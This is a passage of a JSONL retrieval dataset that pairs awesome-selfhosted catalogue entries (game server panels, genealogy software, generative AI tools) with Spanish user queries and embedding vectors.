-0.05088, -0.09333, 0.03375, -0.03557, -0.06405, -0.05956, 0.10603, -0.04293, 0.07706, -0.01584, -0.06402, 0.01809, -0.15684, -0.0064, 0.01897, -0.10097, 0.08188, -0.00131, -0.05086, 0.01227, 0.04259, -0.02306, -0.05636, 0.03275, -0.05313, -0.00479, -0.08981, -0.05012, 0.046, -0.06646, 0.04992, 0.04589, 0.0428, 0.0255, -0.00256, 0.0608, -0.00117, -0.02847, 0.1189, 0.05796, -0.11255, 0.0068, -0.04771, -0.06916, 0.02147, 0.00039, -0.01796, 0.06618, -0.05011, -0.06187, 0.02273, -0.04238, -0.0459, 0.06186, -0.1473, 0.04718, -0.00195, -0.10739, -0.06909, -0.04201, 0.09497, 0.02206, -0.00238, -0.02496, 0.01393, 0.04419, 0.08146, 0.00411, -0.01736, -0.06399, 0.02885, 0.05241, 0.02444, -0.02878, -0.00653, 0.08791, 0.06245, 0.02042, -0.04986, 0.01616, -0.03156, -0.0249, 0.00191, -0.04667, -0.04249, -0.02726, 0.05452, -0.04215, 0.03859, 0.03921, -0.04913, -0.00413, 0.02574, -0.00857, -0.0208, -0.06361, -0.0766, 0.0472, 0.04034, 0.00992, 0.00336, -0.00559, -0.02076, -0.0391, -0.09139, -0.10931, 0.00632, -0.0347, 0.03429, -0.04917, -0.00112, 0.019, -0.0312, -0.00346, 0.08285, 0.01776, -0.01748, 0.00828, 0.02339, -0.00269, -0.01984, -0.00128, -0.02649, -0.00537, -0.00807, -0.01682, -0.02513, 0.0348, -0.07264, 0.02469, 0.03223, 0.06421, 0.02399, 0.03075, -0.03152, -0.0028, -0.03373, 0.04203, -0.00066, -0.06514, 0.01194, -0.01715, 0.10074, -0.06335, 0.03128, -0.00502, 0.05343, 0.0258, 0.02256, 0.00879, 0.04886, -0.02438, 0.02455, 0.03729, 0.02496, -0.01259, 0.07153, 0.00196, -0.05979, -0.03062, -0.05685, -0.00642, -0.02465, -0.00867, -0.04018, -0.07386, -0.01649, -0.05398, -0.01173, -0.06147, -0.02673, -0.05011, 0.0299, -0.08419, 0.00921, 0.00208]} +{"tipo": "pregunta", "herramienta": "Games - Administrative Utilities & Control Panels", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games - Administrative Utilities & Control Panels", "tema": "games - administrative utilities & control panels", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games - Administrative Utilities & Control Panels: Pelican Panel β€” Web application for easy management of game servers, offering a user-friendly interface for deploying, configuring, and managing servers, server monitoring tools, and extensive customization options (fork of Pterodactyl) [AGPL-3.0, PHP/Docker]. Pterodactyl β€” Management panel for game servers, with an intuitive UI for end users [MIT, PHP]. PufferPanel β€” Game server management panel designed for both small networks and game server providers [Apache-2.0, Go]. Retrom β€” Private cloud game library distribution server + frontend/launcher [GPL-3.0, Docker/Rust]. RomM β€” ROM manager for organizing, enriching, and playing retro games, with support for 400+ platforms [⚠, AGPL-3.0, Docker]. SourceBans++ β€” Admin, ban, and communication management system for games running on the Source engine [CC-BY-SA-4.0, PHP]. Sunshine β€” Remote game stream host for Moonlight with support up to 120 frames per second and 4K resolution [GPL-3.0, C++/deb/Docker].", "indexar": "con quΓ© programa puedo organizar mis ROMs y jugar en mΓ‘s de 400 plataformas diferentes?", "v": [-0.00022, 0.13986, -0.0551, -0.09916, -0.03917, -0.11659, 0.0354, -0.04084, -0.11266, -0.1879, -0.04929, -0.05251, 0.0699, -0.0395, 0.10056, 0.02515, 0.06506, 0.01638, -0.0336, 0.05139, -0.12833, -0.09682, -0.06754, -0.10707, 0.05678, -0.01883, 0.10153, -0.02399, -0.1225, -0.02994, 0.01247, -0.02062, 0.11463, -0.14209, -0.01314, -0.12653, 0.10069, 0.00878, -0.00088, 0.01576, -0.11975, 0.10825, -0.00248, 0.00352, 0.14554, 0.0348, 0.05259, -0.04643, 0.02351, -0.06762, -0.01378, 0.05429, 0.01569, -0.08519, 0.01816, -0.15742, 0.0217, -0.12379, -0.05718, 0.00292, -0.01959, 0.02687, 0.06851, -0.00635, 0.10269, 0.07365, -0.0299, 0.06236, -0.02796, 0.13663, -0.03183, -0.00487, -0.03296, 0.05383, 0.00806, 0.09332, -0.04113, 0.00378, -0.07134, -0.0613, 0.06008, -0.04542, -0.08497, 0.12856, 0.01156, -0.06212, 0.00689, -0.03508, -0.04346, -0.03114, 0.05344, 0.03377, -0.05493, -0.01846, -0.02117, -0.12914, 0.18817, 0.05117, 0.08643, 0.02177, -0.0913, -0.04184, -0.08799, 0.08714, -0.19669, -0.03958, 0.03499, -0.04166, 0.0131, -0.0061, -0.09721, 0.03077, -0.08139, 0.07071, 0.02301, 0.03128, -0.00848, 0.07153, 0.09179, 0.01874, -0.05233, 0.03243, 0.05391, 0.0237, 0.11402, -0.01794, -0.06217, 0.16801, -0.0184, -0.00507, 0.03086, -0.03362, -0.03112, 0.02753, -0.07669, -0.08857, 0.07416, -0.0044, 0.08167, 0.00179, 0.00438, 0.06144, 0.05463, -0.09959, 0.06416, 0.0183, 0.02106, -0.02424, -0.02258, -4e-05, 0.05934, 0.06394, 0.02594, 0.05423, -0.02975, 0.02134, 0.04924, -0.03179, -0.14281, 0.02456, -0.04804, -0.04199, -0.03052, -0.08219, 0.07115, -0.03731, 0.06211, 0.00992, 0.01507, 0.08391, -0.05213, 0.10736, 0.07555, -0.13267, -0.07071, 0.0086, -0.0031, -0.01906, -0.03473, -0.03359, -0.06404, 0.00515, 0.04803, 0.01027, -0.05557, -0.08934, -0.03385, -0.01063, 0.03777, 0.03113, 0.03784, 0.08826, -0.08257, -0.00797, 0.05133, 0.0077, -0.00222, -0.03892, 0.00451, 0.0034, 0.02075, -0.01518, 0.0058, 0.00961, -0.01333, 0.08569, -0.00555, 0.01131, 0.04266, 0.0997, 0.0735, -0.03375, 0.06108, 0.03248, -0.04014, -0.0431, 0.00563, 0.0325, 0.09232, 0.03215, 0.01826, -0.01732, -0.00766, -0.02748, -0.01545, -0.01964, 0.05515, 0.00472, 0.02588, 0.04065, 0.01577, 0.00731, -0.00092, -0.00488, 0.00037, -0.03145, 0.00235, -0.05456, -0.03575, -0.00163, -0.01211, 0.04615, -0.00746, -0.04121, -0.00189, -0.06442, -0.03979, -0.02315, -0.01667, 0.00655, -0.02958, -0.0036, 0.0723, -0.05025, -0.04879, 0.02885]} +{"tipo": "pregunta", "herramienta": "Genealogy", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Genealogy", "tema": "genealogy", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Genealogy: Genea.app β€” Genealogy tool designed with privacy in mind that anyone can use to author or edit their family tree. Data is stored in the GEDCOM format and all processing is done in the browser [MIT, Javascript]. Genealogy β€” Record family members and their relationships and build a family tree [MIT, PHP]. GeneWeb β€” Genealogy software that can be used offline or as a Web service [GPL-2.0, OCaml]. Gramps Web β€” Web app for collaborative genealogy, based on and interoperable with Gramps, the open source genealogy desktop application [AGPL-3.0, Docker]. webtrees β€” Webtrees is the web's leading online collaborative genealogy application [GPL-3.0, PHP].", "indexar": "quΓ© programa puedo usar para crear y editar mi Γ‘rbol familiar de forma privada?", "v": [-0.06958, 0.10833, -0.10787, -0.10525, -0.07005, 0.02743, 0.02928, -0.00717, -0.1345, -0.17054, -0.11007, -0.06702, -0.00115, -0.07314, -0.03494, -0.11506, 0.1454, -0.01668, 0.0496, 0.11872, 0.0143, 0.05518, -0.08905, -0.01779, -0.10327, -0.0716, 0.10707, -0.02708, -0.08057, 0.08772, 0.00271, 0.16869, 0.1098, -0.0907, -0.08325, 0.0177, 0.11241, 0.05201, -0.10529, -0.02061, -0.02508, -0.00181, 0.01476, 0.16084, -0.01618, 0.05969, -0.03964, -0.02256, -0.102, 0.04471, -0.09782, -0.04156, -0.06643, -0.07609, 0.03531, -0.11264, 0.00101, -0.18119, 0.05552, 0.08618, -0.10073, 0.0211, 0.0145, -0.0401, -0.02407, -0.11601, 0.04068, -0.0058, -0.07676, -0.03658, -0.01895, -0.08717, -0.01836, -0.03572, 0.13262, 0.09051, 0.00525, -0.13944, 0.03839, 0.03228, -0.03967, -0.02859, -0.02104, 0.01614, -0.02838, 0.01274, 0.02797, -0.01167, 0.03032, -0.08899, -0.04849, -0.06538, 0.00583, 0.04605, -0.02055, -0.00393, -0.0028, 0.07465, -0.01128, 0.0454, 0.10272, -0.04446, -0.03559, 0.15483, -0.03458, 0.0186, -0.00767, 0.0091, -0.06567, 0.09767, -0.02406, 0.0548, 0.0077, 0.00743, -0.07038, 0.00476, -0.05677, -0.09401, 0.01107, -0.03445, -0.01872, 0.08016, -0.01696, 0.0069, 0.03247, 0.00874, -0.01147, 0.19961, -0.10852, 0.10012, -0.06855, -0.02176, -0.08069, -0.08463, -0.07223, -0.02343, -0.0324, -0.08634, 0.00631, -0.035, 0.05376, 0.07701, -0.07986, -0.04918, 0.03567, 0.0088, -0.04778, -0.0493, 0.00685, -0.0136, 0.02453, 0.04734, -0.00268, 0.05261, -0.0463, -0.00983, -0.00836, -0.01153, 0.0261, 0.10445, -0.05721, 0.00054, -0.02347, -0.03422, 0.0769, -0.06161, 0.05551, -0.00908, 0.11464, 0.06606, -0.05777, 0.04942, -0.02131, -0.02969, 0.08299, -0.04571, -0.01984, -0.04334, 0.0072, 0.02218, -0.09057, 0.03382, -0.02923, -0.04398, -0.06785, -0.02256, 0.01784, 0.04253, -0.00258, -0.0027, -0.10268, 0.12352, 0.01549, 0.00034, -0.01558, -0.03184, -0.00805, -0.02724, 0.04253, -0.04476, -0.01761, -0.01146, -0.02329, -0.03983, 0.11502, 0.01048, -0.01935, -0.03094, 0.03029, 0.1392, 0.06115, -0.01253, 0.09018, 0.05782, -0.00818, 0.05281, -0.00895, 0.00414, 0.04212, 0.01223, 0.01653, 0.07649, 0.04346, 0.02194, 0.03027, -0.0023, -0.00392, 0.05101, 0.00029, 0.04514, -0.03889, -0.00993, -0.00255, -0.0325, 0.02175, -0.04102, 0.03718, -0.03672, -0.03953, -0.0357, 0.03118, 0.05413, -0.00209, 0.02205, -0.05939, -0.0439, -0.0808, 0.06292, -0.03934, -0.04912, -0.05743, -0.01617, 0.04773, -0.08559, 0.00028, -0.01229]} +{"tipo": "pregunta", "herramienta": "Genealogy", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Genealogy", "tema": "genealogy", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Genealogy: Genea.app β€” Genealogy tool designed with privacy in mind that anyone can use to author or edit their family tree. Data is stored in the GEDCOM format and all processing is done in the browser [MIT, Javascript]. Genealogy β€” Record family members and their relationships and build a family tree [MIT, PHP]. GeneWeb β€” Genealogy software that can be used offline or as a Web service [GPL-2.0, OCaml]. Gramps Web β€” Web app for collaborative genealogy, based on and interoperable with Gramps, the open source genealogy desktop application [AGPL-3.0, Docker]. webtrees β€” Webtrees is the web's leading online collaborative genealogy application [GPL-3.0, PHP].", "indexar": "hay alguna alternativa libre a Genea.app para gestionar mis datos familiares?", "v": [-0.13699, 0.13618, -0.02307, -0.192, -0.07325, 0.03628, -0.09694, -0.05308, -0.21024, -0.02549, -0.04199, -0.21052, -0.07731, 0.04364, 0.13403, 0.00637, 0.08431, -0.02211, 0.10833, -0.02967, -0.13906, 0.1248, 0.01457, -0.13022, -0.15937, -0.06695, 0.05589, -0.07069, -0.04263, 0.06683, 0.04503, -0.10034, 0.01751, -0.07264, -0.09796, 0.16924, 0.02967, 0.0432, 0.08202, -0.14345, 0.05372, -0.07437, -0.08364, 0.07156, -0.00466, 0.03456, -0.05968, 0.04433, -0.09506, 0.01829, -0.12936, -0.04487, 0.01833, 0.01839, 0.04196, -0.01033, 0.07677, -0.13151, 0.00478, 0.02943, -0.10052, 0.05994, -0.00882, 0.04644, -0.02189, 0.02177, 0.07831, -0.00633, -0.10028, 0.07948, 0.06094, 0.08914, -0.00313, 0.03326, -0.01513, -0.10283, 0.06834, 0.04934, 0.01767, 0.04931, -0.06332, -0.03037, -0.0531, 0.03019, -0.01549, -0.06664, 0.11719, 0.00615, 0.05167, -0.05452, 0.09141, -0.02942, -0.00489, 0.03574, 0.01888, 0.02856, 0.03245, 0.01734, 0.02354, 0.09714, 0.03607, 0.06081, -0.10143, 0.01492, -0.02829, 0.03417, 0.04302, 0.00706, -0.04912, -0.00685, -0.0424, -0.00046, 0.01654, 0.03445, -0.02359, 0.01009, 0.08553, -0.04322, -0.03072, 0.03355, 0.00486, -0.096, 0.07421, -0.03837, 0.00868, 0.00663, -0.00672, 0.09377, 0.01727, 0.12759, -0.03271, -0.07322, -0.07178, -0.05179, -0.08725, 0.02535, -0.0349, -0.01813, 0.08341, -0.08377, -0.05931, 0.0461, -0.03704, -0.0223, 0.0585, -0.06987, -0.03949, 0.02307, 0.07104, -0.00789, -0.03682, -0.02063, -0.01338, 0.11479, -0.0928, 0.07825, -0.05578, -0.08276, -0.04548, 0.01331, 0.02334, -0.02972, -0.09448, 0.04397, -0.04648, -0.00835, 0.08409, 0.01633, -0.02177, 0.03167, -0.05962, 0.08679, 0.06714, -0.0836, 0.0802, -0.07109, -0.01292, -0.10796, 0.02544, -0.0529, 0.00975, -0.06135, -0.00504, -0.0082, -0.04622, -0.02652, 0.00126, 0.03609, -0.00982, 0.01137, -0.00769, 0.11591, 0.00325, -0.06881, 0.0315, -0.00178, -0.02417, -0.02598, 0.02712, 0.04401, -0.03193, -0.0051, 0.03978, -0.01914, -0.03672, 0.09828, 0.01254, 0.00207, 0.0544, 0.03004, -0.01704, 0.01912, 0.07051, 0.0671, -0.06571, -0.03782, 0.04526, 0.0024, 0.06473, -0.01163, 0.00072, 0.06074, 0.02222, 0.00467, -0.04553, 0.02891, 0.08073, -0.00412, -0.00901, -0.0501, 0.05227, 0.0177, 0.06402, 0.03495, 0.00903, -0.02956, -0.02169, -0.01294, 0.00202, -0.01458, 0.03724, 0.02174, 0.05096, 0.00741, -0.07223, -0.03901, -0.07353, 0.03916, 0.02552, -0.04129, -0.02728, -0.00646, 0.01679, -0.0439, 0.00783, -0.00162]} +{"tipo": "pregunta", "herramienta": "Genealogy", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Genealogy", "tema": "genealogy", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Genealogy: Genea.app β€” Genealogy tool designed with privacy in mind that anyone can use to author or edit their family tree. Data is stored in the GEDCOM format and all processing is done in the browser [MIT, Javascript]. Genealogy β€” Record family members and their relationships and build a family tree [MIT, PHP]. GeneWeb β€” Genealogy software that can be used offline or as a Web service [GPL-2.0, OCaml]. Gramps Web β€” Web app for collaborative genealogy, based on and interoperable with Gramps, the open source genealogy desktop application [AGPL-3.0, Docker]. webtrees β€” Webtrees is the web's leading online collaborative genealogy application [GPL-3.0, PHP].", "indexar": "con quΓ© herramienta puedo colaborar en lΓ­nea sobre un Γ‘rbol genealΓ³gico sin instalar nada?", "v": [-0.13291, 0.07303, -0.16784, -0.14033, 0.00353, -0.04748, -0.11448, 0.00958, -0.16883, -0.07755, -0.13947, -0.06956, -0.09284, -0.02859, 0.14152, 0.02765, 0.07071, -0.09415, -0.02098, -0.00582, -0.11365, 0.0418, -0.07646, -0.09807, -0.00536, -0.12974, 0.04038, -0.03236, -0.07353, 0.10852, -0.0472, -0.00069, 0.11908, -0.05855, -0.17779, 0.05429, -0.02438, 0.09344, 0.05175, -0.00583, -0.12115, -0.04341, -0.03129, 0.09629, -0.10425, 0.01304, -0.06816, -0.06876, 0.02357, 0.05664, -0.11584, -0.05159, -0.02954, -0.15706, -0.00945, -0.08878, 0.17358, -0.13055, 0.09603, -0.0358, -0.14505, 0.04853, -0.08574, -0.10861, -0.04279, 0.00837, 0.00765, -0.04242, -0.10366, 0.00096, 0.03816, -0.01956, 0.03472, -0.10999, 0.01945, 0.06095, 0.03362, -0.07324, 0.05442, 0.02004, 0.08416, -0.00377, 0.01851, -0.01923, 0.00478, -0.0122, 0.06688, -0.02676, 0.0396, -0.15003, -0.04788, 0.035, 0.0055, 0.03318, -0.01168, -0.04257, -0.01633, -0.03539, -0.01817, -0.00239, 0.02464, -0.02878, -0.00097, 0.13698, -0.03169, 0.00734, -0.05633, -0.0004, -0.05159, 0.05128, 0.05139, 0.02794, 0.09136, 0.01998, -0.04704, 0.02191, 0.04691, -0.05076, -0.06697, 0.00354, 0.03153, 0.06733, -0.00802, 0.04416, 0.01617, 0.00732, -0.02126, 0.19473, 0.01098, -0.02935, -0.06759, -0.03723, -0.04044, -0.09361, -0.1018, -0.00198, -0.01876, -0.10743, -0.03529, -0.00997, 0.05663, 0.06358, -0.08153, -0.08063, -0.00772, 0.00205, -0.04493, -0.06111, -0.04448, -0.08618, 0.07273, 0.00073, 0.04482, 0.07935, -0.04796, -0.01531, 0.02401, 0.0422, 0.03538, 0.0081, -0.06023, -0.05101, 0.01916, -0.00909, 0.00287, 0.01549, 0.02492, 0.02385, 0.09159, 0.01063, -0.01745, 0.02303, 0.02421, -0.03505, -0.01037, -0.05081, -0.05502, 0.02881, 0.08761, 0.00544, -0.1123, -0.01858, 0.00099, -0.05484, -0.03626, -0.02699, 0.03873, -0.04038, 0.01743, 0.03772, 0.06255, 0.09504, -0.05111, 0.0031, 0.04221, 0.04558, -0.00099, -0.01159, 0.05131, -0.03624, -0.04902, 0.02102, 0.01034, -0.02409, 0.11826, 0.02876, -0.01228, -0.03919, -0.04565, 0.1062, 0.05279, -0.05535, 0.07544, 0.02472, -0.0428, -0.03689, -0.03582, -0.01082, -0.01099, 0.01591, 0.04704, 0.02979, 0.0839, 0.02348, -0.02113, 0.03597, 0.00883, 0.03806, 0.02036, 0.0456, -0.03857, -0.02546, -0.0129, 8e-05, 0.04297, -0.04446, 0.03463, 0.02187, -0.06009, -0.01412, -0.00837, 0.00766, 0.03646, -0.03687, -0.04508, -0.07715, -0.03489, 0.0001, -0.00555, -0.08027, -0.02565, -0.00771, 0.04755, -0.09966, 0.0183, 0.01602]} +{"tipo": "pregunta", "herramienta": "Generative Artificial Intelligence (GenAI)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Generative Artificial Intelligence (GenAI)", "tema": "generative artificial intelligence (genai)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Generative Artificial Intelligence (GenAI): Agenta β€” LLMOps platform for prompt management, LLM evaluation, and observability. Build, evaluate, and monitor production-grade LLM applications with collaborative prompt engineering [MIT, Docker]. AnythingLLM β€” All-in-one desktop & Docker AI application with built-in RAG, AI agents, No-code agent builder, MCP compatibility, and more [MIT, Nodejs/Docker]. GoModel β€” AI gateway written in Go with a unified OpenAI-compatible API for multiple LLM providers, USD cost tracking, budgets, usage analytics, guardrails, caching, and an admin dashboard [MIT, Go/Docker]. Khoj β€” Your AI second brain. Get answers from the web or your docs. Build custom agents, schedule automations, do deep research. Turn any online or local LLM into your personal, autonomous AI [AGPL-3.0, Python/Docker]. LibreChat β€” Enhanced ChatGPT-compatible AI chat interface supporting multiple AI providers, with multi-user auth, message search, and plugin support [⚠, MIT, Nodejs/Docker].", "indexar": "que programa puedo usar para gestionar y evaluar prompts de modelos de lenguaje?", "v": [0.02128, 0.13574, -0.17469, -0.30172, -0.01098, 0.00547, -0.01999, -0.037, -0.10583, -0.13976, -0.03009, 0.04007, 0.02815, -0.018, -0.02508, 0.03436, 0.10187, -0.12812, -0.07841, -0.004, 0.04058, -0.04264, -0.0841, -0.03186, -0.02988, 0.08495, 0.07514, -0.09521, 0.1144, 0.00756, -0.12174, 0.05241, 0.08683, -0.10541, -0.06959, 0.05861, -0.048, 0.04347, 0.00411, 0.13586, 0.03173, 0.05874, -0.06388, 0.00461, 0.12444, 0.0162, 0.02139, -0.00146, -0.05666, -0.09131, -0.01848, -0.04329, -0.00565, 0.04009, 0.0414, -0.01524, 0.08758, -0.081, -0.07282, -0.09702, -0.00374, 0.03027, 0.00387, 0.02671, 0.04027, -0.05868, 0.08801, -0.01456, -0.09802, -0.00149, -0.01786, -0.01266, 0.02072, -0.00945, 0.10221, 0.04899, -0.01997, -0.00414, 0.13098, 0.06505, -0.03369, -0.03231, -5e-05, 0.06248, -0.12326, -0.0498, 0.03778, -0.05129, 0.00601, -0.01453, -0.053, -0.01306, 0.00149, -0.11092, -0.04282, -0.05742, 0.03229, -0.00025, 0.08998, 0.06482, 0.03607, -0.15139, -0.03144, 0.14689, -0.07137, 0.06417, 0.11592, -0.07973, 0.0031, -0.03786, 0.00094, -0.07055, -0.0537, -0.12438, -0.08475, 0.02751, 0.05912, -0.08295, 0.00798, -0.01859, -0.07024, 0.05006, -0.00616, 0.0023, 0.13112, -0.04446, 0.09356, 0.09407, 0.01221, 0.12402, -0.04357, 0.0317, 0.08394, -0.04407, -0.06949, 0.04457, 0.03526, 0.00875, -0.00803, -0.0985, -0.05415, 0.09355, 0.04285, 0.02444, 0.07801, -0.01122, 0.0042, -0.11271, -0.02754, 0.0402, 0.05961, 0.02495, 0.05092, 0.03808, -0.04702, -0.0959, 0.06107, 0.01503, -0.03675, 0.02131, -0.05311, -0.02957, -0.04081, 0.03466, 0.11701, -0.04088, -0.0064, 0.01148, 0.13303, 0.06401, 0.07211, 0.01578, 0.0575, 0.00671, 0.02858, 0.03385, 0.02032, -0.04486, -0.01343, -0.06171, -0.08962, 0.05716, -0.04221, -0.01933, -0.00766, -0.00918, -0.02863, 0.06696, -0.04088, 0.01009, -0.03591, 0.11587, 0.0031, -0.07611, 0.0531, -0.02042, 0.00655, -0.01758, 0.03008, -0.0543, -0.07599, 0.02022, 0.02109, -0.03356, 0.0418, 0.09283, -0.04503, 0.04498, 0.00386, 0.0784, 0.03767, -0.01221, 0.02937, -0.01541, -0.04435, 0.00399, -0.06764, 0.05942, 0.02138, -0.01079, 0.00612, 0.02761, 0.05185, 0.00596, -0.00379, -0.04125, 0.0156, 0.03907, 0.06376, 0.03796, -0.02515, 0.02734, -0.01873, -0.01817, 0.007, 0.00374, 0.04267, -0.0402, -0.03301, -0.05698, 0.00326, 0.10341, -0.0457, -0.04707, -0.05296, -0.03564, -0.09708, 0.03622, 0.02306, -0.01272, 0.00813, 0.03133, 0.02711, -0.05525, 0.04705, -0.00032]} +{"tipo": "pregunta", "herramienta": "Generative Artificial Intelligence (GenAI)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Generative Artificial Intelligence (GenAI)", "tema": "generative artificial intelligence (genai)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Generative Artificial Intelligence (GenAI): Agenta β€” LLMOps platform for prompt management, LLM evaluation, and observability. Build, evaluate, and monitor production-grade LLM applications with collaborative prompt engineering [MIT, Docker]. AnythingLLM β€” All-in-one desktop & Docker AI application with built-in RAG, AI agents, No-code agent builder, MCP compatibility, and more [MIT, Nodejs/Docker]. GoModel β€” AI gateway written in Go with a unified OpenAI-compatible API for multiple LLM providers, USD cost tracking, budgets, usage analytics, guardrails, caching, and an admin dashboard [MIT, Go/Docker]. Khoj β€” Your AI second brain. Get answers from the web or your docs. Build custom agents, schedule automations, do deep research. Turn any online or local LLM into your personal, autonomous AI [AGPL-3.0, Python/Docker]. LibreChat β€” Enhanced ChatGPT-compatible AI chat interface supporting multiple AI providers, with multi-user auth, message search, and plugin support [⚠, MIT, Nodejs/Docker].", "indexar": "con quΓ© herramienta puedo construir agentes autΓ³nomos que respondan preguntas desde la web o mis documentos?", "v": [0.05633, 0.15657, -0.02808, -0.14498, 0.08078, 0.00539, 0.01, -0.03611, -0.22686, -0.01144, -0.07205, -0.04663, 0.02143, -0.08636, 0.1339, 0.03279, 0.10424, -0.09265, 0.01862, 0.05551, -0.01011, -0.12985, -0.01738, 0.0034, -0.06015, -0.0285, 0.09844, -0.00438, -0.02688, 0.1001, 0.01007, 0.03283, -0.03887, 0.07874, -0.04555, 0.03694, -0.08529, 0.117, 0.00119, 0.04508, -0.01582, 0.00521, -0.06511, 0.06756, -0.0111, 0.11467, -0.09228, -0.15466, -0.04279, 0.04307, -0.11812, -0.19973, -0.10841, -0.04492, -0.02967, -0.14721, 0.27299, -0.19598, 0.06701, -0.09142, -0.03156, 0.07222, -0.01771, 0.01277, 0.06906, -0.02805, 0.05168, -0.06527, 0.04924, -0.01156, -0.08807, -0.05596, 0.03108, 0.00735, -0.02421, -0.00446, -0.05829, -0.03506, -0.02077, 0.04007, 0.10026, -0.04169, -0.12099, -0.0347, -0.01378, -0.07653, -0.05817, -0.04558, -0.00209, -0.06238, 0.02478, 0.08475, -0.0014, 0.00485, -0.07728, -0.04338, 0.03656, -0.02803, 0.0011, 0.01451, 0.03489, -0.01385, -0.06309, 0.04031, -0.0029, 0.03705, -0.01786, -0.02535, -0.06742, 0.03807, 0.01439, 0.05271, -0.05215, -0.02546, 0.04191, 0.08541, -0.02748, 0.00345, -0.04766, -0.0627, 0.06169, 0.07015, -0.02069, 0.02346, 0.06769, -0.09192, 0.04981, 0.07577, -0.03021, -0.00903, 0.04158, -0.03808, -0.10209, 0.02062, 0.05813, 0.05069, -0.00469, -0.12713, 0.00935, -0.0512, -0.02601, -0.09793, -0.03052, -0.11985, 0.00773, 0.01849, -0.05335, -0.0288, -0.07115, -0.03966, -0.01437, -0.02168, 0.01289, 0.07652, -0.06853, 0.00881, -0.03357, -0.08345, -0.10138, 0.02839, 0.01989, 0.04932, 0.02247, 0.06426, 0.02571, -0.01434, 0.004, 0.03458, 0.00595, 0.03337, -0.02066, -0.0542, 0.09551, -0.10048, 0.1017, -0.01182, -0.06597, -0.03523, 0.00174, -0.10731, -0.04517, -0.02042, -0.0511, 0.00895, 0.01234, -0.05764, 0.04293, -0.0834, 0.04876, 0.06339, -0.0335, -0.01533, -0.0037, -0.00527, 0.0062, 0.01676, -0.04351, -0.03461, 0.03338, -0.0018, -0.05143, -0.06312, 0.01626, -0.00145, -0.01885, 0.10978, -0.06967, 0.0435, 0.04521, -0.01519, 0.00331, -0.01167, 0.08739, -0.0486, -0.0064, 0.0022, -0.01747, 0.01373, -0.06396, 0.00204, 0.09532, 0.03509, 0.01864, -0.06681, 0.06992, 0.00799, 0.05976, 0.0309, 0.04922, 0.04568, 0.02386, -0.05034, -0.01859, -0.03488, 0.01492, -0.01479, -0.00234, -0.04604, -0.0626, -0.04672, 0.00142, 0.06323, -0.01446, -0.0265, -0.01476, -0.02138, 0.04919, -0.03593, -0.0418, -0.07986, -0.03069, 0.02387, 0.08158, 0.00076, 0.00599, -0.05161]} +{"tipo": "pregunta", "herramienta": "Generative Artificial Intelligence (GenAI)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Generative Artificial Intelligence (GenAI)", "tema": "generative artificial intelligence (genai)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Generative Artificial Intelligence (GenAI): Agenta β€” LLMOps platform for prompt management, LLM evaluation, and observability. Build, evaluate, and monitor production-grade LLM applications with collaborative prompt engineering [MIT, Docker]. AnythingLLM β€” All-in-one desktop & Docker AI application with built-in RAG, AI agents, No-code agent builder, MCP compatibility, and more [MIT, Nodejs/Docker]. GoModel β€” AI gateway written in Go with a unified OpenAI-compatible API for multiple LLM providers, USD cost tracking, budgets, usage analytics, guardrails, caching, and an admin dashboard [MIT, Go/Docker]. Khoj β€” Your AI second brain. Get answers from the web or your docs. Build custom agents, schedule automations, do deep research. Turn any online or local LLM into your personal, autonomous AI [AGPL-3.0, Python/Docker]. LibreChat β€” Enhanced ChatGPT-compatible AI chat interface supporting multiple AI providers, with multi-user auth, message search, and plugin support [⚠, MIT, Nodejs/Docker].", "indexar": "cual es una alternativa libre a ChatGPT que soporte mΓΊltiples proveedores de IA?", "v": [0.05935, 0.08595, -0.12121, -0.08668, -0.00491, -0.05053, 0.15965, -0.13697, -0.23853, -0.01775, -0.03952, 0.06282, 0.02787, 0.02623, 0.0326, -0.01879, -0.00834, -0.19299, 0.12704, -0.01877, -0.0065, 0.0173, -0.02309, -0.12996, -0.15196, 0.10585, 0.08002, 0.07992, -0.07404, 0.11097, 0.01423, -0.07244, -0.04723, 0.00848, -0.03593, -0.08739, 0.02935, 0.05318, 0.06112, -0.06525, 0.079, -0.10404, -0.00485, 0.02765, 0.11418, -0.0459, -0.06746, 7e-05, -0.02157, -0.01138, -0.09075, -0.09645, -0.01045, 0.01987, 0.02005, 0.02049, 0.1749, -0.14801, -0.05831, -0.09922, -0.04012, 0.03157, 0.01395, -0.08482, -0.02174, 0.06842, -0.15333, -0.02631, -0.07825, -0.00283, 0.01181, -0.02604, 0.0448, -0.02951, -0.07451, 0.14707, -0.10029, 0.00226, -0.00227, 0.08908, 0.0909, -0.02884, 0.04898, 0.06861, -0.01697, -0.12034, 0.05481, -0.04241, 0.00551, -0.07322, 0.06488, 0.0071, -0.04143, 0.12183, 0.0145, -0.07151, 0.02415, 0.00578, 0.02449, 0.07625, 0.05854, 0.05522, -0.06747, 0.03114, -0.00907, -0.00048, 0.04801, -0.10905, -0.04865, -0.03125, 0.05533, 0.06479, 0.00614, 0.01436, 0.02173, -0.03071, -0.03299, -0.05381, 0.02097, 0.02423, 0.01791, 0.05684, -0.02129, -0.01182, 0.08693, 0.01999, -0.01541, 0.01658, 0.01135, 0.02445, 0.05344, 0.02033, -0.07077, -0.06934, -0.00644, 0.03856, 0.11458, -0.02488, 0.05099, -0.01469, 0.09963, -0.00919, 0.00479, -0.05587, 0.14083, -0.01664, -0.02138, 